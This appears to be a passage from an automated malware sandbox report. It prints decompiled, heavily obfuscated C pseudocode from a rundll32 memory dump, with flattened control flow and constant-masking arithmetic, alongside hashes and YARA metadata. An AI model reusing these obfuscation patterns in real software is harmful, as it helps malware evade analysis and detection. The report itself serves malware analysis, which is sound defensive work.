				_v1620 = 0x9b43e;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 + 0x190a;
				_v1620 = _v1620 ^ 0x0005a1ac;
				_v1572 = 0xd92c9a;
				_v1572 = _v1572 << 0xc;
				_v1572 = _v1572 ^ 0x92c3ac8e;
				_v1700 = 0x6f30ff;
				_v1700 = _v1700 << 0xe;
				_t429 = 0x26;
				_v1700 = _v1700 / _t429;
				_v1700 = _v1700 >> 0xe;
				_v1700 = _v1700 ^ 0x0006fa3f;
				_v1684 = 0x78d9c1;
				_v1684 = _v1684 * 0x25;
				_v1684 = _v1684 | 0x77a8ffeb;
				_v1684 = _v1684 ^ 0x77fd8a30;
				_v1656 = 0xa4e4c6;
				_v1656 = _v1656 + 0xa942;
				_v1656 = _v1656 + 0xffff73ad;
				_v1656 = _v1656 ^ 0x00a1f1ac;
				_v1652 = 0x64ed51;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 * 0x5c;
				_v1652 = _v1652 ^ 0x00034dfd;
				_v1580 = 0x83183a;
				_v1580 = _v1580 ^ 0x32eb2c8f;
				_v1580 = _v1580 ^ 0x326d5fbf;
				_v1564 = 0x95c9ec;
				_v1564 = _v1564 >> 6;
				_v1564 = _v1564 ^ 0x0008f372;
				_v1588 = 0xb1660f;
				_v1588 = _v1588 + 0x4492;
				_v1588 = _v1588 ^ 0x00bbacbc;
				_v1676 = 0x88aa71;
				_v1676 = _v1676 << 0xd;
				_v1676 = _v1676 | 0x03baa1bf;
				_v1676 = _v1676 << 6;
				_v1676 = _v1676 ^ 0xffa89651;
				_v1632 = 0x868f26;
				_v1632 = _v1632 << 1;
				_v1632 = _v1632 + 0xffffb6b3;
				_v1632 = _v1632 ^ 0x010eb46f;
				_v1640 = 0xd64df9;
				_v1640 = _v1640 >> 6;
				_t430 = 0x32;
				_v1640 = _v1640 / _t430;
				_v1640 = _v1640 ^ 0x000ccd63;
				_v1664 = 0x22c79e;
				_t431 = 0xf;
				_v1664 = _v1664 * 9;
				_v1664 = _v1664 << 0xa;
				_v1664 = _v1664 ^ 0x4da35e74;
				_v1664 = _v1664 ^ 0xa9bd4987;
				_v1696 = 0xf7f994;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 + 0xffff3f9d;
				_v1696 = _v1696 ^ 0x000a4602;
				_v1648 = 0xefbcda;
				_v1648 = _v1648 | 0xaae2c2a8;
				_v1648 = _v1648 + 0x86a3;
				_v1648 = _v1648 ^ 0xaafdd76e;
				_v1680 = 0x28593a;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 | 0x0bfc0be2;
				_v1680 = _v1680 + 0x55be;
				_v1680 = _v1680 ^ 0x0bf8c584;
				_v1596 = 0xd047d1;
				_v1596 = _v1596 | 0xaa1708a2;
				_v1596 = _v1596 ^ 0xaad8bb32;
				_v1604 = 0xf2c56f;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x3cb75693;
				_v1644 = 0x36719;
				_v1644 = _v1644 ^ 0x56bc0977;
				_t432 = 7;
				_v1644 = _v1644 / _t431;
				_v1644 = _v1644 ^ 0x05c6baf7;
				_v1672 = 0x1a4ba5;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 / _t432;
				_v1672 = _v1672 >> 2;
				_v1672 = _v1672 ^ 0x0008f53b;
				_v1628 = 0xe04a84;
				_v1628 = _v1628 | 0x71ddf7de;
				_v1628 = _v1628 + 0xd6a7;
				_v1628 = _v1628 ^ 0x71f84a11;
				_v1688 = 0xb42ba6;
				_t433 = 0x24;
				_v1688 = _v1688 / _t433;
				_v1688 = _v1688 | 0x51e7f8f6;
				_v1688 = _v1688 << 0xb;
				_v1688 = _v1688 ^ 0x3fc44495;
				_v1704 = 0x876d58;
				_v1704 = _v1704 + 0x4bbd;
				_v1704 = _v1704 ^ 0xe392f1ca;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0x62a598c6;
				_v1636 = 0x545e02;
				_v1636 = _v1636 + 0xcb63;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 ^ 0x0aae6d2b;
				_v1612 = 0x26c885;
				_v1612 = _v1612 | 0x5f90e8de;
				_t434 = 0x66;
				_v1612 = _v1612 * 0x52;
				_v1612 = _v1612 ^ 0xa89ce640;
				_v1576 = 0x171d42;
				_v1576 = _v1576 ^ 0x4acb7e15;
				_v1576 = _v1576 ^ 0x4adecc08;
				_v1660 = 0xcbbc2;
				_v1660 = _v1660 >> 8;
				_v1660 = _v1660 / _t434;
				_v1660 = _v1660 ^ 0x3398a9eb;
				_v1660 = _v1660 ^ 0x33921795;
				_v1608 = 0x5e75bf;
				_v1608 = _v1608 + 0xa7f5;
				_v1608 = _v1608 >> 1;
				_v1608 = _v1608 ^ 0x002982b8;
				_v1584 = 0x10acd4;
				_v1584 = _v1584 + 0x75ec;
				_v1584 = _v1584 ^ 0x001a134d;
				_v1616 = 0x7387ff;
				_v1616 = _v1616 | 0x122d515f;
				_v1616 = _v1616 + 0xffffa5db;
				_v1616 = _v1616 ^ 0x12702e1c;
				L1:
				while(_t386 != 0x283f0d8) {
					if(_t386 == 0xc593167) {
						_push(_v1700);
						_push(_v1572);
						_push(0x100010fc);
						_t361 = E00819F66(_v1692, _v1620, __eflags);
						E0082BA6E( &_v1560, __eflags);
						E0082B1B5( &_v520, __eflags, _v1684, _v1656, _v1652, _v1580,  *0x1002520c + 0x220, _v1564, _v1588,  *0x1002520c + 8,  &_v1560,  &_v1040, _t361);
						E0081A203(_v1676, _v1632, _v1640, _t361);
						_t439 =  &(_t439[0x10]);
						L8:
						_t386 = 0xe92714c;
						continue;
					}
					if(_t386 == 0xd2f347e) {
						_push(_v1680);
						_push(_v1648);
						_push(0x1000121c);
						_t371 = E00819F66(_v1664, _v1696, __eflags);
						E0082BA6E( &_v1560, __eflags);
						__eflags = 0;
						E00815383(_v1596, 0, _v1604,  &_v520,  &_v1560, _v1644, _v1672,  &_v1560,  *0x1002520c + 0x220, _v1628,  &_v1040,  *0x1002520c + 8, _v1688, _t371);
						E0081A203(_v1704, _v1636, _v1612, _t371);
						_t439 =  &(_t439[0x11]);
						goto L8;
					}
					if(_t386 == 0xe92714c) {
						_push(_v1616);
						_push(_v1584);
						_push(_v1608);
						_push(_t425);
						_push(_t425);
						_push(_v1660);
						_push(_t386);
						_push(_t425);
						__eflags = E00818B00( &_v520, _v1576, __eflags);
						_t425 =  !=  ? 1 : _t425;
					} else {
						if(_t386 != 0x3c91f62) {
							continue;
						} else {
						}
					}
					return _t425;
				}
				_push(_t386);
				E0081DE7B( &_v1040, _v1624, _v1592, _t386, _v1600, _v1568, _v1668);
				_t439 =  &(_t439[7]);
				_t386 = 0xc593167;
				goto L1;
			}

























































                                                                                                                      0x00828590
                                                                                                                      0x00828597
                                                                                                                      0x00828599
                                                                                                                      0x0082859a
                                                                                                                      0x0082859b
                                                                                                                      0x0082859c
                                                                                                                      0x008285a1
                                                                                                                      0x008285ac
                                                                                                                      0x008285af
                                                                                                                      0x008285bc
                                                                                                                      0x008285c7
                                                                                                                      0x008285cc
                                                                                                                      0x008285d4
                                                                                                                      0x008285df
                                                                                                                      0x008285e4
                                                                                                                      0x008285ea
                                                                                                                      0x008285f2
                                                                                                                      0x008285fa
                                                                                                                      0x008285fe
                                                                                                                      0x00828603
                                                                                                                      0x00828609
                                                                                                                      0x00828611
                                                                                                                      0x0082861c
                                                                                                                      0x00828623
                                                                                                                      0x00828628
                                                                                                                      0x00828631
                                                                                                                      0x0082863c
                                                                                                                      0x00828644
                                                                                                                      0x0082864c
                                                                                                                      0x00828651
                                                                                                                      0x00828656
                                                                                                                      0x0082865e
                                                                                                                      0x00828666
                                                                                                                      0x0082866e
                                                                                                                      0x00828673
                                                                                                                      0x00828678
                                                                                                                      0x00828680
                                                                                                                      0x00828688
                                                                                                                      0x0082868d
                                                                                                                      0x00828695
                                                                                                                      0x0082869d
                                                                                                                      0x008286a8
                                                                                                                      0x008286b0
                                                                                                                      0x008286bb
                                                                                                                      0x008286c3
                                                                                                                      0x008286cc
                                                                                                                      0x008286cf
                                                                                                                      0x008286d3
                                                                                                                      0x008286d8
                                                                                                                      0x008286e0
                                                                                                                      0x008286ed
                                                                                                                      0x008286f1
                                                                                                                      0x008286f9
                                                                                                                      0x00828701
                                                                                                                      0x00828709
                                                                                                                      0x00828711
                                                                                                                      0x00828719
                                                                                                                      0x00828721
                                                                                                                      0x00828729
                                                                                                                      0x00828733
                                                                                                                      0x00828737
                                                                                                                      0x0082873f
                                                                                                                      0x0082874c
                                                                                                                      0x00828757
                                                                                                                      0x00828762
                                                                                                                      0x0082876d
                                                                                                                      0x00828775
                                                                                                                      0x00828780
                                                                                                                      0x0082878b
                                                                                                                      0x00828796
                                                                                                                      0x008287a1
                                                                                                                      0x008287a9
                                                                                                                      0x008287ae
                                                                                                                      0x008287b6
                                                                                                                      0x008287bb
                                                                                                                      0x008287c3
                                                                                                                      0x008287cb
                                                                                                                      0x008287cf
                                                                                                                      0x008287d7
                                                                                                                      0x008287df
                                                                                                                      0x008287e7
                                                                                                                      0x008287f2
                                                                                                                      0x008287f7
                                                                                                                      0x008287fd
                                                                                                                      0x00828805
                                                                                                                      0x00828812
                                                                                                                      0x00828815
                                                                                                                      0x00828819
                                                                                                                      0x0082881e
                                                                                                                      0x00828826
                                                                                                                      0x0082882e
                                                                                                                      0x00828836
                                                                                                                      0x0082883b
                                                                                                                      0x00828840
                                                                                                                      0x00828848
                                                                                                                      0x00828850
                                                                                                                      0x00828858
                                                                                                                      0x00828860
                                                                                                                      0x00828868
                                                                                                                      0x00828870
                                                                                                                      0x00828878
                                                                                                                      0x0082887d
                                                                                                                      0x00828885
                                                                                                                      0x0082888d
                                                                                                                      0x00828895
                                                                                                                      0x008288a0
                                                                                                                      0x008288ab
                                                                                                                      0x008288b6
                                                                                                                      0x008288be
                                                                                                                      0x008288c3
                                                                                                                      0x008288cb
                                                                                                                      0x008288d3
                                                                                                                      0x008288e1
                                                                                                                      0x008288e2
                                                                                                                      0x008288e8
                                                                                                                      0x008288f0
                                                                                                                      0x008288f8
                                                                                                                      0x00828905
                                                                                                                      0x00828909
                                                                                                                      0x0082890e
                                                                                                                      0x00828916
                                                                                                                      0x0082891e
                                                                                                                      0x00828926
                                                                                                                      0x0082892e
                                                                                                                      0x00828938
                                                                                                                      0x00828944
                                                                                                                      0x00828949
                                                                                                                      0x0082894f
                                                                                                                      0x0082895c
                                                                                                                      0x00828966
                                                                                                                      0x0082896e
                                                                                                                      0x00828976
                                                                                                                      0x0082897e
                                                                                                                      0x00828986
                                                                                                                      0x0082898b
                                                                                                                      0x00828993
                                                                                                                      0x0082899b
                                                                                                                      0x008289a3
                                                                                                                      0x008289a8
                                                                                                                      0x008289b0
                                                                                                                      0x008289b8
                                                                                                                      0x008289c5
                                                                                                                      0x008289c6
                                                                                                                      0x008289ca
                                                                                                                      0x008289d2
                                                                                                                      0x008289dd
                                                                                                                      0x008289e8
                                                                                                                      0x008289f3
                                                                                                                      0x008289fb
                                                                                                                      0x00828a06
                                                                                                                      0x00828a0a
                                                                                                                      0x00828a12
                                                                                                                      0x00828a1a
                                                                                                                      0x00828a22
                                                                                                                      0x00828a2a
                                                                                                                      0x00828a2e
                                                                                                                      0x00828a36
                                                                                                                      0x00828a41
                                                                                                                      0x00828a4c
                                                                                                                      0x00828a57
                                                                                                                      0x00828a5f
                                                                                                                      0x00828a67
                                                                                                                      0x00828a6f
                                                                                                                      0x00000000
                                                                                                                      0x00828a77
                                                                                                                      0x00828a85
                                                                                                                      0x00828b48
                                                                                                                      0x00828b4c
                                                                                                                      0x00828b5b
                                                                                                                      0x00828b60
                                                                                                                      0x00828b6e
                                                                                                                      0x00828bc5
                                                                                                                      0x00828bdd
                                                                                                                      0x00828be2
                                                                                                                      0x00828b41
                                                                                                                      0x00828b41
                                                                                                                      0x00000000
                                                                                                                      0x00828b41
                                                                                                                      0x00828a91
                                                                                                                      0x00828aa8
                                                                                                                      0x00828aac
                                                                                                                      0x00828ab8
                                                                                                                      0x00828abd
                                                                                                                      0x00828ace
                                                                                                                      0x00828b1f
                                                                                                                      0x00828b21
                                                                                                                      0x00828b39
                                                                                                                      0x00828b3e
                                                                                                                      0x00000000
                                                                                                                      0x00828b3e
                                                                                                                      0x00828a95
                                                                                                                      0x00828c1f
                                                                                                                      0x00828c23
                                                                                                                      0x00828c2a
                                                                                                                      0x00828c2e
                                                                                                                      0x00828c2f
                                                                                                                      0x00828c30
                                                                                                                      0x00828c3b
                                                                                                                      0x00828c3c
                                                                                                                      0x00828c4f
                                                                                                                      0x00828c51
                                                                                                                      0x00828a9b
                                                                                                                      0x00828aa1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00828aa3
                                                                                                                      0x00828aa1
                                                                                                                      0x00828c60
                                                                                                                      0x00828c60
                                                                                                                      0x00828bea
                                                                                                                      0x00828c10
                                                                                                                      0x00828c15
                                                                                                                      0x00828c18
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c$:Y($Qd$}Z$~4/$u
                                                                                                                      • API String ID: 0-1069939785
                                                                                                                      • Opcode ID: c07cda194e15ca4fb869fda055bfca267ee7ac069ad45a48e723778288357691
                                                                                                                      • Instruction ID: 5562d1969dc00372ede4b93220831305114a22db70689dedfa2997332ad7fa22
                                                                                                                      • Opcode Fuzzy Hash: c07cda194e15ca4fb869fda055bfca267ee7ac069ad45a48e723778288357691
                                                                                                                      • Instruction Fuzzy Hash: 35F101B25093809FD768CF21C94AA9BBBE1FBC5748F10891CF29A96220C7B58549CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00811C30 Relevance: 7.8, Strings: 6, Instructions: 270COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00811C30() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				unsigned int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t307;
				void* _t311;
				void* _t312;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				intOrPtr _t354;
				void* _t361;
				signed int* _t365;

				_t365 =  &_v1168;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0xd27b82;
				_v1132 = 0xd68ad;
				_t317 = 0x39;
				_t361 = 0x31951cf;
				_v1132 = _v1132 / _t317;
				_v1132 = _v1132 | 0x7a114e95;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 ^ 0x003f4f84;
				_v1164 = 0x8948b3;
				_v1164 = _v1164 + 0x5689;
				_v1164 = _v1164 + 0xffffbb3a;
				_t318 = 0x19;
				_v1164 = _v1164 * 0x56;
				_v1164 = _v1164 ^ 0x2e2b97d6;
				_v1072 = 0xcb9c2b;
				_v1072 = _v1072 >> 3;
				_v1072 = _v1072 ^ 0x001ca36a;
				_v1080 = 0x1dbdae;
				_v1080 = _v1080 >> 8;
				_v1080 = _v1080 ^ 0x00014686;
				_v1156 = 0xb5510a;
				_v1156 = _v1156 / _t318;
				_v1156 = _v1156 ^ 0xc10914df;
				_v1156 = _v1156 | 0x9ca0ebe9;
				_v1156 = _v1156 ^ 0xdda118ad;
				_v1104 = 0x66b826;
				_v1104 = _v1104 ^ 0xe9987981;
				_v1104 = _v1104 * 0x25;
				_v1104 = _v1104 ^ 0xd1d8b52b;
				_v1056 = 0xa9a3d5;
				_v1056 = _v1056 * 0x6e;
				_v1056 = _v1056 ^ 0x48e0209e;
				_v1064 = 0xff8e1d;
				_v1064 = _v1064 + 0x7d6c;
				_v1064 = _v1064 ^ 0x0102ce02;
				_v1060 = 0x1cd25;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x00092955;
				_v1112 = 0x2e454b;
				_v1112 = _v1112 ^ 0xdfc484a9;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 ^ 0xfea80718;
				_v1084 = 0x44c343;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0x99776358;
				_v1084 = _v1084 ^ 0x804f0a92;
				_v1148 = 0xd43471;
				_v1148 = _v1148 << 0x10;
				_v1148 = _v1148 ^ 0xf30ce1ba;
				_v1148 = _v1148 | 0x5684f5e4;
				_v1148 = _v1148 ^ 0xd7f82c28;
				_v1140 = 0xc6d087;
				_v1140 = _v1140 * 0xf;
				_v1140 = _v1140 / _t318;
				_t319 = 0x11;
				_v1140 = _v1140 / _t319;
				_v1140 = _v1140 ^ 0x000f807a;
				_v1076 = 0xeb33ff;
				_v1076 = _v1076 | 0x3caa7413;
				_v1076 = _v1076 ^ 0x3ce1a50e;
				_v1160 = 0xf6df2e;
				_v1160 = _v1160 << 3;
				_t320 = 0x12;
				_v1160 = _v1160 / _t320;
				_t321 = 0x23;
				_v1160 = _v1160 / _t321;
				_v1160 = _v1160 ^ 0x0001c97f;
				_v1096 = 0x2990f1;
				_v1096 = _v1096 + 0x8b3d;
				_v1096 = _v1096 << 4;
				_v1096 = _v1096 ^ 0x02a87cfa;
				_v1168 = 0x9204f1;
				_v1168 = _v1168 << 2;
				_v1168 = _v1168 >> 0xe;
				_v1168 = _v1168 ^ 0x6a27e144;
				_v1168 = _v1168 ^ 0x6a24f645;
				_v1068 = 0x63146e;
				_v1068 = _v1068 + 0xffffb906;
				_v1068 = _v1068 ^ 0x00673218;
				_v1124 = 0xa7a9d5;
				_v1124 = _v1124 * 0x43;
				_v1124 = _v1124 + 0xa631;
				_v1124 = _v1124 ^ 0x2beabd88;
				_v1144 = 0x5bd0aa;
				_v1144 = _v1144 * 6;
				_v1144 = _v1144 | 0x1ea27ebc;
				_v1144 = _v1144 + 0xffff7d79;
				_v1144 = _v1144 ^ 0x1eab8d23;
				_v1152 = 0x75499f;
				_v1152 = _v1152 >> 7;
				_v1152 = _v1152 * 0x3b;
				_v1152 = _v1152 * 0x36;
				_v1152 = _v1152 ^ 0x0b6e0547;
				_v1116 = 0xfc11ad;
				_v1116 = _v1116 ^ 0xa8b58fc5;
				_v1116 = _v1116 * 0x46;
				_v1116 = _v1116 ^ 0x042cd8c8;
				_v1088 = 0x98b2ad;
				_v1088 = _v1088 + 0x5f8d;
				_v1088 = _v1088 << 8;
				_v1088 = _v1088 ^ 0x99161df3;
				_v1108 = 0xc44bb5;
				_v1108 = _v1108 + 0xffff808c;
				_v1108 = _v1108 ^ 0x7a0d028c;
				_v1108 = _v1108 ^ 0x7ac2537a;
				_v1128 = 0x834e58;
				_v1128 = _v1128 + 0xffff18d5;
				_v1128 = _v1128 << 0xe;
				_v1128 = _v1128 + 0xe46a;
				_v1128 = _v1128 ^ 0x99c7b134;
				_v1136 = 0xd0608e;
				_v1136 = _v1136 << 0xd;
				_v1136 = _v1136 ^ 0x0f37e4e4;
				_v1136 = _v1136 ^ 0x0bc0752d;
				_v1136 = _v1136 ^ 0x08ebd133;
				_v1120 = 0xe37477;
				_v1120 = _v1120 << 0xf;
				_v1120 = _v1120 << 0x10;
				_v1120 = _v1120 ^ 0x800d4304;
				_v1092 = 0xa7d287;
				_v1092 = _v1092 * 0x3e;
				_v1092 = _v1092 << 0xb;
				_v1092 = _v1092 ^ 0x27ebbc9f;
				_v1100 = 0xbdc4ed;
				_v1100 = _v1100 << 8;
				_t322 = 0x37;
				_v1100 = _v1100 / _t322;
				_v1100 = _v1100 ^ 0x03761b38;
				_t307 = E0082FB4A();
				do {
					while(_t361 != 0x31951cf) {
						if(_t361 == 0x3cad130) {
							_push( &_v1040);
							_push( &_v520);
							_push(_v1100);
							return E00818195(_v1120, _v1092, __eflags);
						}
						if(_t361 == 0xac73e1e) {
							_push(_v1068);
							_push(_v1168);
							_push(0x1000113c);
							_t311 = E00819F66(_v1160, _v1096, __eflags);
							_t312 = E00814EE2(_v1124);
							_t354 =  *0x1002520c;
							_t266 = _t354 + 0x220; // 0x1002542c
							_t268 = _t354 + 8; // 0x10025214
							E0082C77B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
							_t307 = E0081A203(_v1108, _v1128, _v1136, _t311);
							_t365 =  &(_t365[0xd]);
							_t361 = 0x3cad130;
							continue;
						}
						_t373 = _t361 - 0xc947a3e;
						if(_t361 != 0xc947a3e) {
							goto L8;
						}
						_push(_v1104);
						_push(_v1156);
						_push(0x100010cc);
						E0081DBCE(E00819F66(_v1072, _v1080, _t373), _t373, _v1056,  *0x1002520c + 8,  *0x1002520c + 0x220, _v1064, _v1060, _v1112, _v1084,  *0x1002520c + 0x220);
						_t307 = E0081A203(_v1148, _v1140, _v1076, _t314);
						_t365 =  &(_t365[0xd]);
						_t361 = 0xac73e1e;
					}
					_t361 = 0xc947a3e;
					L8:
					__eflags = _t361 - 0x9b97ca4;
				} while (__eflags != 0);
				return _t307;
			}

















































                                                                                                                      0x00811c30
                                                                                                                      0x00811c36
                                                                                                                      0x00811c3d
                                                                                                                      0x00811c42
                                                                                                                      0x00811c4a
                                                                                                                      0x00811c5c
                                                                                                                      0x00811c61
                                                                                                                      0x00811c66
                                                                                                                      0x00811c6a
                                                                                                                      0x00811c72
                                                                                                                      0x00811c77
                                                                                                                      0x00811c7f
                                                                                                                      0x00811c87
                                                                                                                      0x00811c8f
                                                                                                                      0x00811c9e
                                                                                                                      0x00811ca1
                                                                                                                      0x00811ca5
                                                                                                                      0x00811cad
                                                                                                                      0x00811cb5
                                                                                                                      0x00811cba
                                                                                                                      0x00811cc2
                                                                                                                      0x00811cca
                                                                                                                      0x00811ccf
                                                                                                                      0x00811cd7
                                                                                                                      0x00811ce7
                                                                                                                      0x00811ceb
                                                                                                                      0x00811cf3
                                                                                                                      0x00811cfb
                                                                                                                      0x00811d03
                                                                                                                      0x00811d0b
                                                                                                                      0x00811d18
                                                                                                                      0x00811d1c
                                                                                                                      0x00811d24
                                                                                                                      0x00811d37
                                                                                                                      0x00811d3e
                                                                                                                      0x00811d49
                                                                                                                      0x00811d51
                                                                                                                      0x00811d59
                                                                                                                      0x00811d61
                                                                                                                      0x00811d6c
                                                                                                                      0x00811d74
                                                                                                                      0x00811d7f
                                                                                                                      0x00811d87
                                                                                                                      0x00811d8f
                                                                                                                      0x00811d94
                                                                                                                      0x00811d9c
                                                                                                                      0x00811da9
                                                                                                                      0x00811dad
                                                                                                                      0x00811db5
                                                                                                                      0x00811dbd
                                                                                                                      0x00811dc5
                                                                                                                      0x00811dca
                                                                                                                      0x00811dd2
                                                                                                                      0x00811dda
                                                                                                                      0x00811de2
                                                                                                                      0x00811def
                                                                                                                      0x00811dfb
                                                                                                                      0x00811e03
                                                                                                                      0x00811e06
                                                                                                                      0x00811e0c
                                                                                                                      0x00811e14
                                                                                                                      0x00811e1c
                                                                                                                      0x00811e24
                                                                                                                      0x00811e2c
                                                                                                                      0x00811e34
                                                                                                                      0x00811e3f
                                                                                                                      0x00811e44
                                                                                                                      0x00811e4e
                                                                                                                      0x00811e51
                                                                                                                      0x00811e55
                                                                                                                      0x00811e5d
                                                                                                                      0x00811e65
                                                                                                                      0x00811e6d
                                                                                                                      0x00811e72
                                                                                                                      0x00811e7a
                                                                                                                      0x00811e82
                                                                                                                      0x00811e87
                                                                                                                      0x00811e8c
                                                                                                                      0x00811e94
                                                                                                                      0x00811e9c
                                                                                                                      0x00811ea4
                                                                                                                      0x00811eac
                                                                                                                      0x00811eb4
                                                                                                                      0x00811ec1
                                                                                                                      0x00811ec5
                                                                                                                      0x00811ecd
                                                                                                                      0x00811ed5
                                                                                                                      0x00811ee2
                                                                                                                      0x00811ee6
                                                                                                                      0x00811eee
                                                                                                                      0x00811ef6
                                                                                                                      0x00811efe
                                                                                                                      0x00811f06
                                                                                                                      0x00811f10
                                                                                                                      0x00811f19
                                                                                                                      0x00811f1d
                                                                                                                      0x00811f25
                                                                                                                      0x00811f2d
                                                                                                                      0x00811f3a
                                                                                                                      0x00811f3e
                                                                                                                      0x00811f46
                                                                                                                      0x00811f4e
                                                                                                                      0x00811f56
                                                                                                                      0x00811f5b
                                                                                                                      0x00811f63
                                                                                                                      0x00811f6b
                                                                                                                      0x00811f73
                                                                                                                      0x00811f7b
                                                                                                                      0x00811f83
                                                                                                                      0x00811f8b
                                                                                                                      0x00811f93
                                                                                                                      0x00811f98
                                                                                                                      0x00811fa0
                                                                                                                      0x00811fa8
                                                                                                                      0x00811fb0
                                                                                                                      0x00811fb5
                                                                                                                      0x00811fbd
                                                                                                                      0x00811fc5
                                                                                                                      0x00811fcd
                                                                                                                      0x00811fd5
                                                                                                                      0x00811fda
                                                                                                                      0x00811fdf
                                                                                                                      0x00811fe7
                                                                                                                      0x00811ff4
                                                                                                                      0x00811ff8
                                                                                                                      0x00811ffd
                                                                                                                      0x00812007
                                                                                                                      0x0081200f
                                                                                                                      0x0081201a
                                                                                                                      0x0081201d
                                                                                                                      0x00812021
                                                                                                                      0x00812031
                                                                                                                      0x00812045
                                                                                                                      0x00812045
                                                                                                                      0x00812053
                                                                                                                      0x00812177
                                                                                                                      0x0081217f
                                                                                                                      0x00812180
                                                                                                                      0x00000000
                                                                                                                      0x00812191
                                                                                                                      0x0081205b
                                                                                                                      0x008120ea
                                                                                                                      0x008120ee
                                                                                                                      0x008120fa
                                                                                                                      0x008120ff
                                                                                                                      0x0081210d
                                                                                                                      0x00812116
                                                                                                                      0x0081211c
                                                                                                                      0x0081212b
                                                                                                                      0x0081213f
                                                                                                                      0x00812151
                                                                                                                      0x00812156
                                                                                                                      0x00812159
                                                                                                                      0x00000000
                                                                                                                      0x00812159
                                                                                                                      0x00812061
                                                                                                                      0x00812063
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00812069
                                                                                                                      0x0081206d
                                                                                                                      0x00812079
                                                                                                                      0x008120c6
                                                                                                                      0x008120db
                                                                                                                      0x008120e0
                                                                                                                      0x008120e3
                                                                                                                      0x008120e3
                                                                                                                      0x00812160
                                                                                                                      0x00812162
                                                                                                                      0x00812162
                                                                                                                      0x00812162
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: baca91a794a0e7c3fd6e6c2fdcf88c70c4b6f9b5167e9fca30c832c3318b6c7c
                                                                                                                      • Instruction ID: 363575cbef58308c80ea4a47e8674bf361aac1567c69a414cf3e46df1b2f69c8
                                                                                                                      • Opcode Fuzzy Hash: baca91a794a0e7c3fd6e6c2fdcf88c70c4b6f9b5167e9fca30c832c3318b6c7c
                                                                                                                      • Instruction Fuzzy Hash: 66D12FB24083809FC368CF25C58A94BFBE1FBC5748F508A1DF2E696260D7B58949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0082069C Relevance: 7.8, Strings: 6, Instructions: 266COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0082069C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				intOrPtr _v20;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t225;
				signed int _t257;
				signed int* _t258;
				void* _t260;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int* _t305;
				void* _t308;

				_t302 = _a8;
				_t258 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0081C325(_t225);
				_v20 = 0x578391;
				_t305 =  &(( &_v164)[4]);
				asm("stosd");
				_t260 = 0x3e847b6;
				asm("stosd");
				asm("stosd");
				_v136 = 0x7901e7;
				_v136 = _v136 ^ 0x0e05b978;
				_v136 = _v136 | 0x8500df2f;
				_v136 = _v136 ^ 0x8f7cffbf;
				_v72 = 0x5c6105;
				_v72 = _v72 ^ 0xba418fb0;
				_v72 = _v72 ^ 0xba16afcf;
